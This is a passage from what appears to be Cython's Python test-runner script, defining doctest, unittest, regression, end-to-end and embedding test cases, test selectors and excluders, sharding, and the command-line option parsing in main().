                "Tests in module '%s' were unexpectedly killed by signal %d, see test output for details." % (
                    module_name, result_code & 255))
        result_code >>= 8
        if result_code in (0,1):
            try:
                with open(result_file, 'rb') as f:
                    PartialTestResult.join_results(result, pickle.load(f))
            except Exception:
                raise Exception(
                    "Failed to load test result from test in module '%s' after exit status %d,"
                    " see test output for details." % (module_name, result_code))
        if result_code:
            raise Exception(
                "Tests in module '%s' exited with status %d, see test output for details." % (
                    module_name, result_code))
    finally:
        try:
            os.unlink(result_file)
        except:
            pass
class PureDoctestTestCase(unittest.TestCase):
    """Runs the doctests of a plain Python module, without compiling it.

    If the test carries a 'mypy' tag, the module is additionally type
    checked with mypy (when mypy is installed).
    """

    def __init__(self, module_name, module_path, tags, stats=None):
        self.tags = tags
        self.module_name = self.name = module_name
        self.module_path = module_path
        self.stats = stats
        unittest.TestCase.__init__(self, 'run')

    def shortDescription(self):
        return "running pure doctests in %s" % self.module_name

    def run(self, result=None):
        # Custom driver: import the module under a unique name so that it
        # cannot clash with (or reuse) a compiled version, run its
        # doctests, then unload it again.
        if result is None:
            result = self.defaultTestResult()
        loaded_module_name = 'pure_doctest__' + self.module_name
        result.startTest(self)
        try:
            self.setUp()
            import imp
            with self.stats.time(self.name, 'py', 'pyimport'):
                m = imp.load_source(loaded_module_name, self.module_path)
            try:
                with self.stats.time(self.name, 'py', 'pyrun'):
                    doctest.DocTestSuite(m).run(result)
            finally:
                del m
                if loaded_module_name in sys.modules:
                    del sys.modules[loaded_module_name]
                check_thread_termination()
        except Exception:
            result.addError(self, sys.exc_info())
            result.stopTest(self)
        try:
            self.tearDown()
        except Exception:
            # Cleanup failures must not shadow the test outcome.
            pass
        if 'mypy' in self.tags['tag']:
            try:
                from mypy import api as mypy_api
            except ImportError:
                pass
            else:
                with self.stats.time(self.name, 'py', 'mypy'):
                    mypy_result = mypy_api.run([
                        self.module_path,
                        '--ignore-missing-imports',
                        '--follow-imports', 'skip',
                    ])
                # mypy_result is (stdout, stderr, exit_status); a non-zero
                # exit status means type errors were found.
                if mypy_result[2]:
                    self.fail(mypy_result[0])
# Matches "private" attribute names: a single leading underscore (but not
# dunder names like '__dict__').
is_private_field = re.compile('^_[^_]').match
class _FakeClass(object):
def __init__(self, **kwargs):
self._shortDescription = kwargs.get('module_name')
self.__dict__.update(kwargs)
def shortDescription(self):
return self._shortDescription
try: # Py2.7+ and Py3.2+
from unittest.runner import _TextTestResult
except ImportError:
from unittest import _TextTestResult
class PartialTestResult(_TextTestResult):
    """Test result that can be pickled in a forked child process and merged
    back into the parent's result object (see run_forked_test())."""

    def __init__(self, base_result):
        _TextTestResult.__init__(
            self, self._StringIO(), True,
            base_result.dots + base_result.showAll*2)

    def strip_error_results(self, results):
        # Replace private attributes of recorded test cases with None (or a
        # minimal fake for '_dt_test') so that data() can be pickled.
        for test_case, error in results:
            for attr_name in filter(is_private_field, dir(test_case)):
                if attr_name == '_dt_test':
                    test_case._dt_test = _FakeClass(
                        name=test_case._dt_test.name)
                elif attr_name != '_shortDescription':
                    setattr(test_case, attr_name, None)

    def data(self):
        # Return the picklable payload handed back to the parent process.
        self.strip_error_results(self.failures)
        self.strip_error_results(self.errors)
        return (self.failures, self.errors, self.skipped, self.testsRun,
                self.stream.getvalue())

    def join_results(result, data):
        """Static method for merging the result back into the main
        result object.
        """
        failures, errors, skipped, tests_run, output = data
        if output:
            result.stream.write(output)
        result.errors.extend(errors)
        result.skipped.extend(skipped)
        result.failures.extend(failures)
        result.testsRun += tests_run

    join_results = staticmethod(join_results)

    class _StringIO(StringIO):
        # _TextTestResult expects its stream to provide writeln().
        def writeln(self, line):
            self.write("%s\n" % line)
class CythonUnitTestCase(CythonRunTestCase):
    """Compiles a test module and runs the unittest tests found in it
    (instead of the doctests that CythonRunTestCase runs)."""

    def shortDescription(self):
        return "compiling (%s) tests in %s" % (
            self.language, self.description_name())

    def run_tests(self, result, ext_so_path):
        # Time the import of the freshly built extension module separately
        # from the actual test run.
        with self.stats.time(self.name, self.language, 'import'):
            extension_module = import_ext(self.module, ext_so_path)
        suite = unittest.defaultTestLoader.loadTestsFromModule(extension_module)
        with self.stats.time(self.name, self.language, 'run'):
            suite.run(result)
class CythonPyregrTestCase(CythonRunTestCase):
    """Runs a CPython regression test module after compiling it with Cython."""

    def setUp(self):
        CythonRunTestCase.setUp(self)
        from Cython.Compiler import Options
        # Relax compiler strictness and use CPython-like directive defaults
        # so that the unmodified stdlib test modules compile.
        Options.error_on_unknown_names = False
        Options.error_on_uninitialized = False
        Options._directive_defaults.update(dict(
            binding=True, always_allow_keywords=True,
            set_initial_path="SOURCEFILE"))
        patch_inspect_isfunction()

    def related_files(self, test_directory, module_name):
        return _list_pyregr_data_files(test_directory)

    def _run_unittest(self, result, *classes):
        """Run tests from unittest.TestCase-derived classes."""
        valid_types = (unittest.TestSuite, unittest.TestCase)
        suite = unittest.TestSuite()
        for cls in classes:
            if isinstance(cls, str):
                if cls in sys.modules:
                    suite.addTest(unittest.findTestCases(sys.modules[cls]))
                else:
                    raise ValueError("str arguments must be keys in sys.modules")
            elif isinstance(cls, valid_types):
                suite.addTest(cls)
            else:
                suite.addTest(unittest.makeSuite(cls))
        with self.stats.time(self.name, self.language, 'run'):
            suite.run(result)

    def _run_doctest(self, result, module):
        self.run_doctests(module, result, None)

    def run_tests(self, result, ext_so_path):
        try:
            from test import support
        except ImportError: # Python2.x
            from test import test_support as support

        def run_test(result):
            def run_unittest(*classes):
                return self._run_unittest(result, *classes)
            def run_doctest(module, verbosity=None):
                return self._run_doctest(result, module)

            # Monkey-patch test.support so that the regression test's
            # test_main() reports into our result object; restored below.
            backup = (support.run_unittest, support.run_doctest)
            support.run_unittest = run_unittest
            support.run_doctest = run_doctest

            try:
                try:
                    sys.stdout.flush() # helps in case of crashes
                    with self.stats.time(self.name, self.language, 'import'):
                        module = import_ext(self.module, ext_so_path)
                    sys.stdout.flush() # helps in case of crashes
                    if hasattr(module, 'test_main'):
                        # help 'doctest.DocFileTest' find the module path through frame inspection
                        fake_caller_module_globals = {
                            'module': module,
                            '__name__': module.__name__,
                        }
                        call_tests = eval(
                            'lambda: module.test_main()',
                            fake_caller_module_globals, fake_caller_module_globals)
                        call_tests()
                        sys.stdout.flush() # helps in case of crashes
                except (unittest.SkipTest, support.ResourceDenied):
                    result.addSkip(self, 'ok')
            finally:
                support.run_unittest, support.run_doctest = backup

        run_forked_test(result, run_test, self.shortDescription(), self.fork)
class TestCodeFormat(unittest.TestCase):
    """Checks the project's Python sources against the pycodestyle rules."""

    def __init__(self, cython_dir):
        self.cython_dir = cython_dir
        unittest.TestCase.__init__(self)

    def runTest(self):
        import pycodestyle
        # Prefer the setup.cfg of the Cython checkout under test; fall back
        # to the one shipped next to this test runner.
        config_file = os.path.join(self.cython_dir, "setup.cfg")
        if not os.path.exists(config_file):
            config_file = os.path.join(os.path.dirname(__file__), "setup.cfg")
        paths = []
        for code_dir in ['Cython', 'Demos', 'docs', 'pyximport', 'tests']:
            pattern = os.path.join(self.cython_dir, code_dir + "/**/*.py")
            paths.extend(glob.glob(pattern, recursive=True))
        checker = pycodestyle.StyleGuide(config_file=config_file)
        print("")  # Fix the first line of the report.
        report = checker.check_files(paths)
        self.assertEqual(report.total_errors, 0, "Found code style errors.")
# Debugger tests are only collected when running on CPython
# (see collect_unittests() / collect_doctests() below).
include_debugger = IS_CPYTHON
def collect_unittests(path, module_prefix, suite, selectors, exclude_selectors):
    """Collect unittest tests from 'Test*.py' modules below *path*.

    Only looks inside package directories named 'Tests', applies the
    include/exclude selectors to the dotted module name, imports each
    matching module and adds its tests to *suite*.
    """
    def file_matches(filename):
        return filename.startswith("Test") and filename.endswith(".py")

    def package_matches(dirname):
        return dirname == "Tests"

    loader = unittest.TestLoader()

    skipped_dirs = []
    if not include_debugger:
        skipped_dirs.append('Cython' + os.path.sep + 'Debugger' + os.path.sep)

    for dirpath, dirnames, filenames in os.walk(path):
        if dirpath != path and "__init__.py" not in filenames:
            # Not a package => remember it so its subdirectories get
            # skipped as well.
            skipped_dirs.append(dirpath + os.path.sep)
            continue
        if any(dirpath.startswith(skipped) for skipped in skipped_dirs):
            continue
        parentname = os.path.split(dirpath)[-1]
        if not package_matches(parentname):
            continue
        for filename in filenames:
            if not file_matches(filename):
                continue
            filepath = os.path.join(dirpath, filename)[:-len(".py")]
            modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
            if not any(match(modulename) for match in selectors):
                continue
            if any(match(modulename) for match in exclude_selectors):
                continue
            module = __import__(modulename)
            for submodule_name in modulename.split('.')[1:]:
                module = getattr(module, submodule_name)
            suite.addTests([loader.loadTestsFromModule(module)])
def collect_doctests(path, module_prefix, suite, selectors, exclude_selectors):
    """Collect doctests from the .py modules below *path* into *suite*."""
    def package_matches(dirname):
        if dirname == 'Debugger' and not include_debugger:
            return False
        return dirname not in ("Mac", "Distutils", "Plex", "Tempita")

    def file_matches(filename):
        basename, ext = os.path.splitext(filename)
        blacklist = ['libcython', 'libpython', 'test_libcython_in_gdb',
                     'TestLibCython']
        if ext != '.py':
            return False
        if '~' in basename or '#' in basename:
            return False
        if basename.startswith('.'):
            return False
        return basename not in blacklist

    import doctest
    for dirpath, dirnames, filenames in os.walk(path):
        # Prune excluded packages in place so that os.walk() does not
        # descend into them.
        dirnames[:] = [d for d in dirnames if package_matches(d)]
        for filename in filenames:
            if not file_matches(filename):
                continue
            if not filename.endswith('.py'):
                continue
            filepath = os.path.join(dirpath, filename)
            if os.path.getsize(filepath) == 0:
                continue
            filepath = filepath[:-len(".py")]
            modulename = module_prefix + filepath[len(path)+1:].replace(os.path.sep, '.')
            if not any(match(modulename) for match in selectors):
                continue
            if any(match(modulename) for match in exclude_selectors):
                continue
            if 'in_gdb' in modulename:
                # These should only be imported from gdb.
                continue
            module = __import__(modulename)
            for submodule_name in modulename.split('.')[1:]:
                module = getattr(module, submodule_name)
            if hasattr(module, "__doc__") or hasattr(module, "__test__"):
                try:
                    suite.addTest(doctest.DocTestSuite(module))
                except ValueError:  # no tests
                    pass
class EndToEndTest(unittest.TestCase):
    """
    This is a test of build/*.srctree files, where srctree defines a full
    directory structure and its header gives a list of commands to run.
    """
    cython_root = os.path.dirname(os.path.abspath(__file__))

    def __init__(self, treefile, workdir, cleanup_workdir=True, stats=None,
                 capture=True):
        self.name = os.path.splitext(os.path.basename(treefile))[0]
        self.treefile = treefile
        self.workdir = os.path.join(workdir, self.name)
        self.cleanup_workdir = cleanup_workdir
        self.stats = stats
        self.capture = capture
        cython_syspath = [self.cython_root]
        for path in sys.path:
            if path.startswith(self.cython_root) and path not in cython_syspath:
                # Py3 installation and refnanny build prepend their
                # fixed paths to sys.path => prefer that over the
                # generic one (cython_root itself goes last)
                cython_syspath.append(path)
        self.cython_syspath = os.pathsep.join(cython_syspath[::-1])
        unittest.TestCase.__init__(self)

    def shortDescription(self):
        return "End-to-end %s" % self.name

    def setUp(self):
        # Unpack the srctree file into the working directory and make it
        # the current directory for the commands to run in.
        from Cython.TestUtils import unpack_source_tree
        _, self.commands = unpack_source_tree(self.treefile, self.workdir)
        self.old_dir = os.getcwd()
        os.chdir(self.workdir)
        if self.workdir not in sys.path:
            sys.path.insert(0, self.workdir)

    def tearDown(self):
        if self.cleanup_workdir:
            # Retry the removal a few times in case it fails temporarily
            # (e.g. files still being held open).
            for trial in range(5):
                try:
                    shutil.rmtree(self.workdir)
                except OSError:
                    time.sleep(0.1)
                else:
                    break
        os.chdir(self.old_dir)

    def _try_decode(self, content):
        # Subprocess output arrives as bytes; decode leniently for display.
        try:
            return content.decode()
        except UnicodeDecodeError:
            return content.decode('iso-8859-1')

    def runTest(self):
        self.success = False
        # Expand the CYTHONIZE/CYTHON/PYTHON placeholders in the commands.
        commands = (self.commands
            .replace("CYTHONIZE", "PYTHON %s" % os.path.join(self.cython_root, 'cythonize.py'))
            .replace("CYTHON", "PYTHON %s" % os.path.join(self.cython_root, 'cython.py'))
            .replace("PYTHON", sys.executable))
        old_path = os.environ.get('PYTHONPATH')
        env = dict(os.environ)
        new_path = self.cython_syspath
        if old_path:
            new_path = new_path + os.pathsep + old_path
        env['PYTHONPATH'] = new_path
        cmd = []
        out = []
        err = []
        for command_no, command in enumerate(filter(None, commands.splitlines()), 1):
            with self.stats.time('%s(%d)' % (self.name, command_no), 'c',
                                 'etoe-build' if ' setup.py ' in command else 'etoe-run'):
                if self.capture:
                    p = subprocess.Popen(command,
                                         stderr=subprocess.PIPE,
                                         stdout=subprocess.PIPE,
                                         shell=True,
                                         env=env)
                    _out, _err = p.communicate()
                    res = p.returncode
                else:
                    p = subprocess.call(command,
                                        shell=True,
                                        env=env)
                    _out, _err = b'', b''
                    res = p
            cmd.append(command)
            out.append(_out)
            err.append(_err)
            if res != 0:
                # Dump the output of all commands run so far on failure.
                for c, o, e in zip(cmd, out, err):
                    sys.stderr.write("%s\n%s\n%s\n\n" % (
                        c, self._try_decode(o), self._try_decode(e)))
            self.assertEqual(0, res, "non-zero exit status")
        self.success = True
# TODO: Support cython_freeze needed here as well.
# TODO: Windows support.
class EmbedTest(unittest.TestCase):
    """Builds and runs the embedding demo in Demos/embed via 'make test'."""

    working_dir = "Demos/embed"

    def setUp(self):
        self.old_dir = os.getcwd()
        os.chdir(self.working_dir)
        os.system(
            "make PYTHON='%s' clean > /dev/null" % sys.executable)

    def tearDown(self):
        try:
            os.system(
                "make PYTHON='%s' clean > /dev/null" % sys.executable)
        except:
            pass
        os.chdir(self.old_dir)

    def test_embed(self):
        libname = sysconfig.get_config_var('LIBRARY')
        libdir = sysconfig.get_config_var('LIBDIR')
        if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
            # LIBDIR does not contain the Python library; try fallback
            # locations relative to the interpreter executable.
            libdir = os.path.join(os.path.dirname(sys.executable), '..', 'lib')
            if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
                libdir = os.path.join(libdir, 'python%d.%d' % sys.version_info[:2], 'config')
                if not os.path.isdir(libdir) or libname not in os.listdir(libdir):
                    # report the error for the original directory
                    libdir = sysconfig.get_config_var('LIBDIR')
        cython = 'cython.py'
        if sys.version_info[0] >=3 and CY3_DIR:
            cython = os.path.join(CY3_DIR, cython)
        cython = os.path.abspath(os.path.join('..', '..', cython))
        self.assertEqual(0, os.system(
            "make PYTHON='%s' CYTHON='%s' LIBDIR1='%s' test > make.output" % (sys.executable, cython, libdir)))
        try:
            os.remove('make.output')
        except OSError:
            pass
class MissingDependencyExcluder(object):
    """Excludes tests whose required module cannot be imported.

    *deps* maps a test matcher (selector string) to the name of the module
    that the matching tests depend on.
    """

    def __init__(self, deps):
        # deps: { matcher func : module name }
        self.tests_missing_deps = []
        self.exclude_matchers = [
            string_selector(matcher)
            for matcher, module_name in deps.items()
            if not self._importable(module_name)
        ]

    @staticmethod
    def _importable(module_name):
        # True if the dependency module can be imported.
        try:
            __import__(module_name)
        except ImportError:
            return False
        return True

    def __call__(self, testname, tags=None):
        if any(matcher(testname, tags) for matcher in self.exclude_matchers):
            self.tests_missing_deps.append(testname)
            return True
        return False
class VersionDependencyExcluder(object):
    """Excludes tests that cannot run on the current Python version.

    *deps* maps a version to a (compare, matcher) pair; whenever
    compare(current_version_info, version) holds, tests accepted by the
    matcher are excluded.
    """

    def __init__(self, deps):
        # deps: { version : matcher func }
        from sys import version_info
        self.exclude_matchers = [
            matcher
            for version, (compare, matcher) in deps.items()
            if compare(version_info, version)
        ]
        self.tests_missing_deps = []

    def __call__(self, testname, tags=None):
        excluded = any(matcher(testname) for matcher in self.exclude_matchers)
        if excluded:
            self.tests_missing_deps.append(testname)
        return excluded
class FileListExcluder(object):
    """Excludes tests listed (one per line) in a plain text file.

    Blank lines and '#' comment lines are ignored; only the first
    whitespace-separated token of each line is used as a test name.
    """

    def __init__(self, list_file, verbose=False):
        self.verbose = verbose
        self._list_file = os.path.relpath(list_file)
        self.excludes = {}
        with open(list_file) as f:
            for raw_line in f:
                entry = raw_line.strip()
                if not entry or entry.startswith('#'):
                    continue
                self.excludes[entry.split()[0]] = True

    def __call__(self, testname, tags=None):
        # Match either the full dotted name or its last component.
        last_part = testname.split('.')[-1]
        exclude = testname in self.excludes or last_part in self.excludes
        if exclude and self.verbose:
            print("Excluding %s because it's listed in %s"
                  % (testname, self._list_file))
        return exclude
class TagsSelector(object):
    """Selects tests that carry a given value for a given tag."""

    def __init__(self, tag, value):
        self.tag = tag
        self.value = value

    def __call__(self, testname, tags=None):
        # Without tag information there is nothing to match against.
        if tags is None:
            return False
        return self.value in tags[self.tag]
class RegExSelector(object):
    """Selects tests whose name matches a (case-insensitive) regex."""

    def __init__(self, pattern_string):
        try:
            compiled = re.compile(pattern_string, re.I | re.U)
        except re.error:
            print('Invalid pattern: %r' % pattern_string)
            raise
        self.regex_matches = compiled.search

    def __call__(self, testname, tags=None):
        return self.regex_matches(testname)
def string_selector(s):
    """Build a selector from *s*: 'tag:value' or a plain regex pattern."""
    if ':' not in s:
        return RegExSelector(s)
    tag, value = s.split(':', 1)
    return TagsSelector(tag, value)
class ShardExcludeSelector(object):
    # This is an exclude selector so it can override the (include) selectors.
    # It may not provide uniform distribution (in time or count), but is a
    # deterministic partition of the tests which is important.
    def __init__(self, shard_num, shard_count):
        self.shard_num = shard_num
        self.shard_count = shard_count

    def __call__(self, testname, tags=None, _hash=zlib.crc32, _is_py2=IS_PY2):
        # Cannot use simple hash() here as shard processes might use different hash seeds.
        # CRC32 is fast and simple, but might return negative values in Py2.
        if _is_py2:
            hashval = _hash(testname) & 0x7fffffff
        else:
            hashval = _hash(testname.encode())
        # Exclude everything that does not fall into this selector's shard.
        return hashval % self.shard_count != self.shard_num
class PendingThreadsError(RuntimeError):
    """Raised when a test leaves non-terminating background threads behind."""
# Threads already reported as left-over by an earlier test, so that
# check_thread_termination() only warns about each offender once.
threads_seen = []
def check_thread_termination(ignore_seen=True):
    """Raise PendingThreadsError if a test left background threads running.

    Each left-over thread gets a short join() timeout first.  With
    ignore_seen=True, threads already recorded in 'threads_seen' are not
    reported again.
    """
    if threading is None: # no threading enabled in CPython
        return
    current = threading.current_thread()
    blocking_threads = []
    for t in threading.enumerate():
        # Ignore finished threads, ourselves, and the keep-alive thread.
        if not t.is_alive() or t == current or t.name == 'time_stamper':
            continue
        t.join(timeout=2)
        if t.is_alive():
            if not ignore_seen:
                blocking_threads.append(t)
                continue
            # Only report threads we have not warned about before.
            for seen in threads_seen:
                if t is seen:
                    break
            else:
                threads_seen.append(t)
                blocking_threads.append(t)
    if not blocking_threads:
        return
    sys.stderr.write("warning: left-over threads found after running test:\n")
    for t in blocking_threads:
        sys.stderr.write('...%s\n' % repr(t))
    raise PendingThreadsError("left-over threads found after running test")
def subprocess_output(cmd):
    """Run *cmd* and return its combined stdout/stderr as a unicode string.

    Returns an empty string if the command cannot be executed at all.
    """
    try:
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        captured, _ = proc.communicate()
        return captured.decode('UTF-8')
    except OSError:
        return ''
def get_version():
    """Return the Cython version string, annotated with the git HEAD commit
    and an 'uncommitted changes' marker when running from a modified
    checkout."""
    from Cython.Compiler.Version import version as cython_version
    full_version = cython_version
    top = os.path.dirname(os.path.abspath(__file__))
    if not os.path.exists(os.path.join(top, '.git')):
        return full_version
    # Query git from inside the checkout, restoring the cwd afterwards.
    old_dir = os.getcwd()
    try:
        os.chdir(top)
        head_commit = subprocess_output(['git', 'rev-parse', 'HEAD']).strip()
        version_commit = subprocess_output(['git', 'rev-parse', cython_version]).strip()
        diff = subprocess_output(['git', 'diff', '--stat']).strip()
    finally:
        os.chdir(old_dir)
    if head_commit != version_commit:
        full_version += " " + head_commit
    if diff:
        full_version += ' + uncommitted changes'
    return full_version
# Keep references to the original standard streams; tests may replace
# sys.stdout/sys.stderr temporarily (see e.g. the Cython error capturing
# in CythonCompileTestCase.compile()).
_orig_stdout, _orig_stderr = sys.stdout, sys.stderr
def flush_and_terminate(status):
    """Flush the original stdio streams, then hard-exit with *status*.

    Uses os._exit() (not sys.exit()) so that left-over non-terminating
    threads cannot keep the process alive.
    """
    try:
        _orig_stdout.flush()
        _orig_stderr.flush()
    finally:
        os._exit(status)
def main():
    """Command line entry point of the test runner.

    Parses the options, optionally shards the run across parallel worker
    processes, collects coverage data, and finally exits with the overall
    return code (terminating hard if stray threads remain).
    """
    global DISTDIR, WITH_CYTHON

    # Set an environment variable to the top directory
    os.environ['CYTHON_PROJECT_DIR'] = os.path.abspath(os.path.dirname(__file__))

    DISTDIR = os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))

    # Consume '--debug*' flags that name Cython compiler debug switches.
    from Cython.Compiler import DebugFlags
    args = []
    for arg in sys.argv[1:]:
        if arg.startswith('--debug') and arg[2:].replace('-', '_') in dir(DebugFlags):
            setattr(DebugFlags, arg[2:].replace('-', '_'), True)
        else:
            args.append(arg)

    from optparse import OptionParser
    parser = OptionParser()
    parser.add_option("--no-cleanup", dest="cleanup_workdir",
                      action="store_false", default=True,
                      help="do not delete the generated C files (allows passing --no-cython on next run)")
    parser.add_option("--no-cleanup-sharedlibs", dest="cleanup_sharedlibs",
                      action="store_false", default=True,
                      help="do not delete the generated shared library files (allows manual module experimentation)")
    parser.add_option("--no-cleanup-failures", dest="cleanup_failures",
                      action="store_false", default=True,
                      help="enable --no-cleanup and --no-cleanup-sharedlibs for failed tests only")
    parser.add_option("--no-cython", dest="with_cython",
                      action="store_false", default=True,
                      help="do not run the Cython compiler, only the C compiler")
    parser.add_option("--compiler", dest="compiler", default=None,
                      help="C compiler type")
    backend_list = ','.join(BACKENDS)
    parser.add_option("--backends", dest="backends", default=backend_list,
                      help="select backends to test (default: %s)" % backend_list)
    parser.add_option("--no-c", dest="use_c",
                      action="store_false", default=True,
                      help="do not test C compilation backend")
    parser.add_option("--no-cpp", dest="use_cpp",
                      action="store_false", default=True,
                      help="do not test C++ compilation backend")
    parser.add_option("--no-unit", dest="unittests",
                      action="store_false", default=True,
                      help="do not run the unit tests")
    parser.add_option("--no-doctest", dest="doctests",
                      action="store_false", default=True,
                      help="do not run the doctests")
    parser.add_option("--no-file", dest="filetests",
                      action="store_false", default=True,
                      help="do not run the file based tests")
    parser.add_option("--no-pyregr", dest="pyregr",
                      action="store_false", default=True,
                      help="do not run the regression tests of CPython in tests/pyregr/")
    parser.add_option("--no-examples", dest="examples",
                      action="store_false", default=True,
                      help="Do not run the documentation tests in the examples directory.")
    parser.add_option("--no-code-style", dest="code_style",
                      action="store_false", default=True,
                      help="Do not run the code style (PEP8) checks.")
    parser.add_option("--cython-only", dest="cython_only",
                      action="store_true", default=False,
                      help="only compile pyx to c, do not run C compiler or run the tests")
    parser.add_option("--no-refnanny", dest="with_refnanny",
                      action="store_false", default=True,
                      help="do not regression test reference counting")
    parser.add_option("--no-fork", dest="fork",
                      action="store_false", default=True,
                      help="do not fork to run tests")
    parser.add_option("--sys-pyregr", dest="system_pyregr",
                      action="store_true", default=False,
                      help="run the regression tests of the CPython installation")
    parser.add_option("-x", "--exclude", dest="exclude",
                      action="append", metavar="PATTERN",
                      help="exclude tests matching the PATTERN")
    parser.add_option("-j", "--shard_count", dest="shard_count", metavar="N",
                      type=int, default=1,
                      help="shard this run into several parallel runs")
    parser.add_option("--shard_num", dest="shard_num", metavar="K",
                      type=int, default=-1,
                      help="test only this single shard")
    parser.add_option("--profile", dest="profile",
                      action="store_true", default=False,
                      help="enable profiling of the tests")
    parser.add_option("-C", "--coverage", dest="coverage",
                      action="store_true", default=False,
                      help="collect source coverage data for the Compiler")
    parser.add_option("--coverage-xml", dest="coverage_xml",
                      action="store_true", default=False,
                      help="collect source coverage data for the Compiler in XML format")
    parser.add_option("--coverage-html", dest="coverage_html",
                      action="store_true", default=False,
                      help="collect source coverage data for the Compiler in HTML format")
    parser.add_option("-A", "--annotate", dest="annotate_source",
                      action="store_true", default=True,
                      help="generate annotated HTML versions of the test source files")
    parser.add_option("--no-annotate", dest="annotate_source",
                      action="store_false",
                      help="do not generate annotated HTML versions of the test source files")
    parser.add_option("-v", "--verbose", dest="verbosity",
                      action="count", default=0,
                      help="display test progress, pass twice to print test names")
    parser.add_option("-T", "--ticket", dest="tickets",
                      action="append",
                      help="a bug ticket number to run the respective test in 'tests/*'")
    parser.add_option("-3", dest="language_level",
                      action="store_const", const=3, default=2,
                      help="set language level to Python 3 (useful for running the CPython regression tests)'")
    parser.add_option("--xml-output", dest="xml_output_dir", metavar="DIR",
                      help="write test results in XML to directory DIR")
    parser.add_option("--exit-ok", dest="exit_ok", default=False,
                      action="store_true",
                      help="exit without error code even on test failures")
    parser.add_option("--failfast", dest="failfast", default=False,
                      action="store_true",
                      help="stop on first failure or error")
    parser.add_option("--root-dir", dest="root_dir", default=os.path.join(DISTDIR, 'tests'),
                      help=("Directory to look for the file based "
                            "tests (the ones which are deactivated with '--no-file'."))
    parser.add_option("--examples-dir", dest="examples_dir",
                      default=os.path.join(DISTDIR, 'docs', 'examples'),
                      help="Directory to look for documentation example tests")
    parser.add_option("--work-dir", dest="work_dir", default=os.path.join(os.getcwd(), 'TEST_TMP'),
                      help="working directory")
    parser.add_option("--cython-dir", dest="cython_dir", default=os.getcwd(),
                      help="Cython installation directory (default: use local source version)")
    parser.add_option("--debug", dest="for_debugging", default=False, action="store_true",
                      help="configure for easier use with a debugger (e.g. gdb)")
    parser.add_option("--pyximport-py", dest="pyximport_py", default=False, action="store_true",
                      help="use pyximport to automatically compile imported .pyx and .py files")
    parser.add_option("--watermark", dest="watermark", default=None,
                      help="deterministic generated by string")
    parser.add_option("--use_common_utility_dir", default=False, action="store_true")
    parser.add_option("--use_formal_grammar", default=False, action="store_true")
    parser.add_option("--test_determinism", default=False, action="store_true",
                      help="test whether Cython's output is deterministic")
    parser.add_option("--pythran-dir", dest="pythran_dir", default=None,
                      help="specify Pythran include directory. This will run the C++ tests using Pythran backend for Numpy")
    parser.add_option("--no-capture", dest="capture", default=True, action="store_false",
                      help="do not capture stdout, stderr in srctree tests. Makes pdb.set_trace interactive")
    parser.add_option("--limited-api", dest="limited_api", default=False, action="store_true",
                      help="Compiles Cython using CPython's LIMITED_API")

    options, cmd_args = parser.parse_args(args)

    if options.with_cython and sys.version_info[0] >= 3:
        sys.path.insert(0, options.cython_dir)

    # requires glob with the wildcard.
    if sys.version_info < (3, 5) or cmd_args:
        options.code_style = False

    WITH_CYTHON = options.with_cython

    coverage = None
    if options.coverage or options.coverage_xml or options.coverage_html:
        if not WITH_CYTHON:
            options.coverage = options.coverage_xml = options.coverage_html = False
        elif options.shard_num == -1:
            # Coverage is started here only in the non-sharded master run.
            print("Enabling coverage analysis")
            from coverage import coverage as _coverage
            coverage = _coverage(branch=True)
            coverage.erase()
            coverage.start()

    if options.xml_output_dir:
        shutil.rmtree(options.xml_output_dir, ignore_errors=True)

    if options.capture:
        keep_alive_interval = 10
    else:
        keep_alive_interval = None
    if options.shard_count > 1 and options.shard_num == -1:
        # Master process: fan the shards out over a process pool and
        # collect their stats and return codes.
        import multiprocessing
        pool = multiprocessing.Pool(options.shard_count)
        tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
        errors = []
        # NOTE: create process pool before time stamper thread to avoid forking issues.
        total_time = time.time()
        stats = Stats()
        with time_stamper_thread(interval=keep_alive_interval):
            for shard_num, shard_stats, return_code in pool.imap_unordered(runtests_callback, tasks):
                if return_code != 0:
                    errors.append(shard_num)
                    sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
                sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
                stats.update(shard_stats)
        pool.close()
        pool.join()
        total_time = time.time() - total_time
        sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
        if errors:
            sys.stderr.write("Errors for shards %s\n" % ", ".join([str(e) for e in errors]))
            return_code = 1
        else:
            return_code = 0
    else:
        # Single (or per-shard worker) run.
        with time_stamper_thread(interval=keep_alive_interval):
            _, stats, return_code = runtests(options, cmd_args, coverage)

    if coverage:
        if options.shard_count > 1 and options.shard_num == -1:
            coverage.combine()
        coverage.stop()

    stats.print_stats(sys.stderr)
    if coverage:
        save_coverage(coverage, options)

    sys.stderr.write("ALL DONE\n")
    sys.stderr.flush()

    try:
        check_thread_termination(ignore_seen=False)
    except PendingThreadsError:
        # normal program exit won't kill the threads, do it the hard way here
        flush_and_terminate(return_code)
    else:
        sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
    """
    Print regular time stamps into the build logs to find slow tests.

    @param interval: time interval in seconds; no stamping if falsy/negative
    """
    if not interval or interval < 0:
        # Do nothing
        yield
        return

    try:
        _xrange = xrange
    except NameError:
        _xrange = range

    import threading
    import datetime
    from time import sleep

    # Poll the stop flag four times per second so shutdown stays responsive.
    interval = _xrange(interval * 4)
    now = datetime.datetime.now
    stop = False

    # We capture stderr in some places.
    # => make sure we write to the real (original) stderr of the test runner.
    stderr = os.dup(2)

    def write(s):
        os.write(stderr, s if type(s) is bytes else s.encode('ascii'))

    def time_stamper():
        while True:
            for _ in interval:
                if stop:
                    return
                sleep(1./4)
            write('\n#### %s\n' % now())

    thread = threading.Thread(target=time_stamper, name='time_stamper')
    # 'Thread.setDaemon()' is deprecated (Python 3.10+); assigning the
    # 'daemon' attribute works on both Py2.6+ and Py3.
    thread.daemon = True
    thread.start()
    try:
        yield
    finally:
        stop = True
        thread.join()
        os.close(stderr)
def configure_cython(options):
    """Configure global Cython compiler settings for this test run.

    Mutates module-level compiler defaults, so it must be called before any
    test modules are compiled.
    """
    global CompilationOptions, pyrex_default_options, cython_compile
    from Cython.Compiler.Options import \
